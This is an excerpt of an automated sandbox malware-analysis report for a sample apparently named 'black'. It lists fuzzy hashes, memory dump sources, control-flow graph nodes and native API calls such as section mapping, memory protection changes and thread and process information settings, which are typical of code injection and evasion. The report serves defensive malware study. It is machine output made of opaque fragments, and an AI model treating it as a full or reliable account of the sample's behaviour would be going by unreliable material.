                                                  • Opcode ID: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                  • Instruction ID: 809020f850aa888941f619afed2d9eb2ca75ddefd294c62c935cb63c3037a7a9
                                                  • Opcode Fuzzy Hash: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                  • Instruction Fuzzy Hash: 1B318325A1C7C281EA10CF92F8761B52B60BF55B86F8801B6E9CEC3766DE2CE551C750
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID: @
                                                  • API String ID: 3000768030-2766056989
                                                  • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                  • Instruction ID: 039704c9c56a762c2b43104af029cf8c46f305369b14d3d79a063c445c9c0fb0
                                                  • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                  • Instruction Fuzzy Hash: B0218622E1868241EB748F26A8A51392661EF45776F2803B9E6EFC77D5CE3CD881C301
                                                  APIs
                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CA9F1D3E), ref: 00007FF6CA9F40BC
                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CA9F1D3E), ref: 00007FF6CA9F4102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                  • Instruction ID: 87fa61050273065669f42b65a12b32109596a444ec3e71e5c4f310d4314f202d
                                                  • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                  • Instruction Fuzzy Hash: B9115832618B8182EB208F15F85026AB7A0FB88B85F184274EECD87769DF3CD552CB04
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA63
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastObjectSingleWait
                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                  • API String ID: 1211598281-2248577382
                                                  • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                  • Instruction ID: bb0e0578d490eea53a56fb7351d1488896b3c63f1eae2fc4a910ce18acd22165
                                                  • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                  • Instruction Fuzzy Hash: E1E01221E15C4241F5106F61FC6647832107F65776F9043B1D4BFC21E19E2C59468304
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FindHandleModuleResource
                                                  • String ID: RTL
                                                  • API String ID: 3537982541-834975271
                                                  • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                  • Instruction ID: 715356a4a7ab7265388e4a8bcb963fbdc14ab86a252661cfb9f70aceaa94deda
                                                  • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                  • Instruction Fuzzy Hash: 63D017A1F1968682FF195FE5B46937426505F2CB82F4840B8C88A87391EE6C9099C798

                                                  Execution Graph

                                                   Execution Coverage: 21.5%
                                                   Dynamic/Decrypted Code Coverage: 100%
                                                   Signature Coverage: 92.3%
                                                   Total number of Nodes: 39
                                                   Total number of Limit Nodes: 0
                                                  execution_graph 19670 23ac138 19671 23ac187 NtOpenFile 19670->19671 19673 23ac20a 19671->19673 19674 23ac3b8 19675 23ac401 NtQuerySystemInformation 19674->19675 19677 23ac46e 19675->19677 19693 23ac270 19694 23ac2bf NtCreateSection 19693->19694 19696 23ac34d 19694->19696 19705 23ac4d0 19706 23ac51c NtMapViewOfSection 19705->19706 19708 23ac5df 19706->19708 19709 23ab750 19710 23ab79f NtProtectVirtualMemory 19709->19710 19712 23ab817 19710->19712 19682 23ac788 19683 23ac7d1 NtDeviceIoControlFile 19682->19683 19685 23ac880 19683->19685 19713 23ab548 19714 23ab58c NtSetInformationThread 19713->19714 19716 23ab5f9 19714->19716 19686 23d7309 19687 23d735d NtSetInformationProcess 19686->19687 19688 23d73c8 19687->19688 19678 23ab420 19679 23ab469 NtQueryInformationProcess 19678->19679 19681 23ab4e1 19679->19681 19689 23abc80 19690 23abccc NtAllocateVirtualMemory 19689->19690 19692 23abd4f 19690->19692 19697 23ab660 19698 23ab6a4 NtClose 19697->19698 19700 23ab6f0 19698->19700 19701 23ac660 19702 23ac6a9 NtQueryVolumeInformationFile 19701->19702 19704 23ac721 19702->19704 19717 23d9940 19718 23d9988 EnumWindows 19717->19718 19720 23d99ed 19718->19720
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0Xg$!g-C$)h7:$,9]$-@2 $/W;$6f=h$:3)$:#Q$<D;y$Lei$O3)$ljP$v?b$_c$EA$EA
                                                  • API String ID: 0-1893062264
                                                  • Opcode ID: 42f93cdab0c9b5a31de11a8371b04e2064da90256f1611c16e66ece062e3b457
                                                  • Instruction ID: 749e34d248f580113a14c1901137a93000dac48c4af1445d29e78d7b5478faed
                                                  • Opcode Fuzzy Hash: 42f93cdab0c9b5a31de11a8371b04e2064da90256f1611c16e66ece062e3b457
                                                  • Instruction Fuzzy Hash: 2D04E774E00219AFCB94DFA9C840A9DB7B2EF89304F1081EAD919E7750DB35AE91CF45

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2456 cdc6e0-cdc705 2457 cdc70c-cdc759 2456->2457 2458 cdc707 2456->2458 2459 cdc75b-cdc762 2457->2459 2460 cdc792-cdc7c3 2457->2460 2458->2457 2462 cdc76a-cdc790 2459->2462 2463 cdc82a-cdc83e 2460->2463 2464 cdc7c5-cdc7d1 2460->2464 2462->2460 2465 cdc7d4-cdc7d8 2462->2465 2463->2459 2468 cdc844-cdc861 2463->2468 2464->2465 2466 cdc7f9 2465->2466 2467 cdc7da-cdc7e3 2465->2467 2469 cdc7fc-cdc80b 2466->2469 2470 cdc7ea-cdc7ed 2467->2470 2471 cdc7e5-cdc7e8 2467->2471 2474 cdc868-cdc8bc 2468->2474 2469->2462 2473 cdc811-cdc825 2469->2473 2472 cdc7f7 2470->2472 2471->2472 2472->2469 2475 cdc8d8-cdc8e9 2473->2475 2474->2459 2479 cdc8c2-cdc8d6 2474->2479 2476 cdc908 2475->2476 2477 cdc8eb-cdc901 2475->2477 2481 cdc909 2476->2481 2477->2476 2479->2475 2481->2481
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 9,7$\;^q$\;^q
                                                  • API String ID: 0-1039145247
                                                  • Opcode ID: fe141be1b49e27e860838114904be48c42ad10645accc9dd5c6f4a2763eb2e1f
                                                  • Instruction ID: 02d1288121924228f702062fa42732ea2f9d95c5b3fffb3f0ad6ca678e0fde1b
                                                  • Opcode Fuzzy Hash: fe141be1b49e27e860838114904be48c42ad10645accc9dd5c6f4a2763eb2e1f
                                                  • Instruction Fuzzy Hash: 4561EF74E002099BDB58CFAAD484ADDBBF2AF88300F14C12AE825B7354DB749946DF64

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2482 2500b18-2500b3d 2483 2500b44-2500b49 2482->2483 2484 2500b3f 2482->2484 2485 2500b6a 2483->2485 2486 2500b4b-2500b54 2483->2486 2484->2483 2489 2500b6d-2500b74 2485->2489 2487 2500b56-2500b59 2486->2487 2488 2500b5b-2500b5e 2486->2488 2490 2500b68 2487->2490 2488->2490 2491 2500b95 2489->2491 2492 2500b76-2500b7f 2489->2492 2490->2489 2495 2500b98-2500bc9 2491->2495 2493 2500b81-2500b84 2492->2493 2494 2500b86-2500b89 2492->2494 2496 2500b93 2493->2496 2494->2496 2498 2500bd1-2500bda 2495->2498 2496->2495
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q$4'^q
                                                  • API String ID: 0-622892151
                                                  • Opcode ID: 726a261bb5add20cf19e147f70e08cbcd3bcfc527c29164bcf6a1b26d75a0186
                                                  • Instruction ID: e34b8bd15f48cbde0d218d55754bc05ca31ca2963bfaa1cf248fc2a7abcb99c4
                                                  • Opcode Fuzzy Hash: 726a261bb5add20cf19e147f70e08cbcd3bcfc527c29164bcf6a1b26d75a0186
                                                  • Instruction Fuzzy Hash: 7421F374E0020EDFCF08CF98D984AEEBBB2BB49314F104469E5007B290DB359E44CBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2519 23d6d68-23d6d7a 2521 23d6d9d-23d6da8 2519->2521 2522 23d6d7c-23d6d82 2519->2522 2523 23d6dab-23d6dd9 2522->2523 2524 23d6d84-23d6d9a 2522->2524 2526 23d6e5c-23d6e65 2523->2526 2527 23d6ddf-23d6e02 2523->2527 2529 23d6e04-23d6e0a 2527->2529 2530 23d6e66-23d6e70 2527->2530 2529->2526 2531 23d6e0c 2529->2531 2534 23d6ed9 2530->2534 2535 23d6e72-23d6e7d 2530->2535 2533 23d6e0f-23d6e12 2531->2533 2533->2530 2536 23d6e14-23d6e22 2533->2536 2537 23d6eda-23d6ee4 2534->2537 2535->2537 2538 23d6e7f-23d6e95 2535->2538 2539 23d6e24-23d6e3b 2536->2539 2540 23d6e46-23d6e4c 2536->2540 2546 23d6ee5-23d6ef3 2537->2546 2547 23d6f44-23d6f4f 2537->2547 2541 23d6e9c-23d6ec8 call cd9a90 2538->2541 2542 23d6e97 2538->2542 2539->2540 2549 23d6e3d-23d6e45 2539->2549 2540->2530 2543 23d6e4e-23d6e5a 2540->2543 2542->2541 2543->2526 2543->2533 2550 23d7310-23d73c6 NtSetInformationProcess 2546->2550 2547->2550 2555 23d73cf-23d740f 2550->2555 2556 23d73c8-23d73ce 2550->2556 2556->2555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XUi
                                                  • API String ID: 0-1850529527
                                                  • Opcode ID: 723cd92c642748673e9e12647bb1eac98a05c4467c6eb330e2b2a99485fed3b3
                                                  • Instruction ID: 997a40c87f331d0c2e7166363aae38c07e53326a0903780b2b538f38c9514fc5
                                                  • Opcode Fuzzy Hash: 723cd92c642748673e9e12647bb1eac98a05c4467c6eb330e2b2a99485fed3b3
                                                  • Instruction Fuzzy Hash: 35918D75D00258DFCB01DFA9E980A9DFBB1FF49310F1485AAE828AB251D730E946CF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2561 23d7290-23d7298 2563 23d730a-23d73c6 NtSetInformationProcess 2561->2563 2564 23d729a-23d72a7 2561->2564 2567 23d73cf-23d740f 2563->2567 2568 23d73c8-23d73ce 2563->2568 2564->2563 2568->2567
                                                  APIs
                                                  • NtSetInformationProcess.NTDLL(?,?,?,?), ref: 023D73B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcess
                                                  • String ID: U
                                                  • API String ID: 1801817001-3372436214
                                                  • Opcode ID: 480eabb360ca5f77d2916802f8f33fc8121d59fdfe20483d75cbe2f73f5b6094
                                                  • Instruction ID: f9fa656bf26cc16355a89398a8c409686f32fb4341f5e40612e545627cfcc243
                                                  • Opcode Fuzzy Hash: 480eabb360ca5f77d2916802f8f33fc8121d59fdfe20483d75cbe2f73f5b6094
                                                  • Instruction Fuzzy Hash: 0D4198B9D002589FCB10CFA9D984ADEFBB0FB09310F20906AE814BB314D375A945CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2572 cdadd8-cdae03 2573 cdae0a-cdae52 2572->2573 2574 cdae05 2572->2574 2575 cdae55-cdae85 call cdacf0 2573->2575 2574->2573 2578 cdae8b-cdaec5 call cd9888 2575->2578 2582 cdaec8-cdaf0c 2578->2582 2582->2575 2585 cdaf12-cdaf34 2582->2585 2587 cdaf37-cdaf64 2585->2587 2587->2575 2589 cdaf6a-cdafac 2587->2589 2592 cdafaf-cdafc6 2589->2592 2592->2582 2593 cdafcc-cdaff1 2592->2593 2594 cdb275-cdb2e9 call cdaa50 2593->2594 2595 cdaff7-cdb000 2593->2595 2599 cdb2ef-cdb307 2594->2599 2600 cdb38e-cdb3a2 2594->2600 2595->2575 2596 cdb006-cdb042 2595->2596 2596->2587 2604 cdb048-cdb065 2596->2604 2602 cdb309-cdb345 2599->2602 2603 cdb35a-cdb361 2599->2603 2600->2578 2605 cdb3a8-cdb3c7 call cdaa50 2600->2605 2607 cdb34c-cdb351 2602->2607 2608 cdb347 2602->2608 2603->2587 2609 cdb367-cdb383 2603->2609 2610 cdb241-cdb268 2604->2610 2605->2575 2615 cdb3cd-cdb433 call cd11b8 call cd9a90 2605->2615 2607->2600 2612 cdb353 2607->2612 2608->2607 2609->2600 2613 cdb26e 2610->2613 2614 cdb06a-cdb0a2 call cdacf0 2610->2614 2612->2603 2613->2594 2614->2575 2620 cdb0a8-cdb0d2 2614->2620 2632 cdb438-cdb454 2615->2632 2625 cdb105-cdb1cb call cdaa50 2620->2625 2626 cdb0d4-cdb0fe 2620->2626 2655 cdb1ce call cdddcc 2625->2655 2656 cdb1ce call 23a6048 2625->2656 2657 cdb1ce call 23a6039 2625->2657 2658 cdb1ce call cddde8 2625->2658 2626->2625 2632->2592 2634 cdb45a-cdb497 2632->2634 2637 cdb49d-cdb49e 2634->2637 2638 cdb599-cdb5d2 2634->2638 2637->2638 2641 cdb5d8-cdb609 2638->2641 2642 cdb4a3-cdb4fa 2638->2642 2639 cdb1d1-cdb1f9 2639->2575 2645 cdb1ff-cdb23a 2639->2645 2649 cdb60a 2641->2649 2642->2637 2648 cdb4fc-cdb569 2642->2648 2645->2610 2652 cdb56b 2648->2652 2653 cdb570-cdb592 2648->2653 2649->2649 2652->2653 2653->2638 2655->2639 2656->2639 2657->2639 2658->2639
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5A5T$XUi
                                                  • API String ID: 0-1829385252
                                                  • Opcode ID: da790dcb481d64ec9a78fbead909ef6dd068f618d9b9dceec93d28d8d2f33e79
                                                  • Instruction ID: 5cdb1b54a0b6d49ac832db9a3cf26b4d47ce1f71ba54374837ef7e32670ad500
                                                  • Opcode Fuzzy Hash: da790dcb481d64ec9a78fbead909ef6dd068f618d9b9dceec93d28d8d2f33e79
                                                  • Instruction Fuzzy Hash: 6332B474E00219DFDB58DFA9D981B9DB7B2BF88300F0081AAE529A7361DB349D85CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2659 cdadc8-cdae03 2660 cdae0a-cdae52 2659->2660 2661 cdae05 2659->2661 2662 cdae55-cdae85 call cdacf0 2660->2662 2661->2660 2665 cdae8b-cdaec5 call cd9888 2662->2665 2669 cdaec8-cdaf0c 2665->2669 2669->2662 2672 cdaf12-cdaf34 2669->2672 2674 cdaf37-cdaf64 2672->2674 2674->2662 2676 cdaf6a-cdafac 2674->2676 2679 cdafaf-cdafc6 2676->2679 2679->2669 2680 cdafcc-cdaff1 2679->2680 2681 cdb275-cdb2e9 call cdaa50 2680->2681 2682 cdaff7-cdb000 2680->2682 2686 cdb2ef-cdb307 2681->2686 2687 cdb38e-cdb3a2 2681->2687 2682->2662 2683 cdb006-cdb042 2682->2683 2683->2674 2691 cdb048-cdb065 2683->2691 2689 cdb309-cdb345 2686->2689 2690 cdb35a-cdb361 2686->2690 2687->2665 2692 cdb3a8-cdb3c7 call cdaa50 2687->2692 2694 cdb34c-cdb351 2689->2694 2695 cdb347 2689->2695 2690->2674 2696 cdb367-cdb383 2690->2696 2697 cdb241-cdb268 2691->2697 2692->2662 2702 cdb3cd-cdb433 call cd11b8 call cd9a90 2692->2702 2694->2687 2699 cdb353 2694->2699 2695->2694 2696->2687 2700 cdb26e 2697->2700 2701 cdb06a-cdb0a2 call cdacf0 2697->2701 2699->2690 2700->2681 2701->2662 2707 cdb0a8-cdb0d2 2701->2707 2719 cdb438-cdb454 2702->2719 2712 cdb105-cdb1cb call cdaa50 2707->2712 2713 cdb0d4-cdb0fe 2707->2713 2742 cdb1ce call cdddcc 2712->2742 2743 cdb1ce call 23a6048 2712->2743 2744 cdb1ce call 23a6039 2712->2744 2745 cdb1ce call cddde8 2712->2745 2713->2712 2719->2679 2721 cdb45a-cdb497 2719->2721 2724 cdb49d-cdb49e 2721->2724 2725 cdb599-cdb5d2 2721->2725 2724->2725 2728 cdb5d8-cdb609 2725->2728 2729 cdb4a3-cdb4fa 2725->2729 2726 cdb1d1-cdb1f9 2726->2662 2732 cdb1ff-cdb23a 2726->2732 2736 cdb60a 2728->2736 2729->2724 2735 cdb4fc-cdb569 2729->2735 2732->2697 2739 cdb56b 2735->2739 2740 cdb570-cdb592 2735->2740 2736->2736 2739->2740 2740->2725 2742->2726 2743->2726 2744->2726 2745->2726
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5A5T$XUi
                                                  • API String ID: 0-1829385252
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q
                                                  • API String ID: 0-3189636481
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q
                                                  • API String ID: 0-355816377
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :S.c
                                                  • API String ID: 0-261385982
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-603837250
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 023AC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  APIs
                                                  • NtDeviceIoControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 023AC86E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: ControlDeviceFile
                                                  • String ID:
                                                  • API String ID: 3512290074-0
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 023AC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  APIs
                                                  • NtDeviceIoControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 023AC86E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: ControlDeviceFile
                                                  • String ID:
                                                  • API String ID: 3512290074-0
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 023AC33B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 023AC33B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 023AC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 023AC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 023ABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 023ABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 023AB4CF
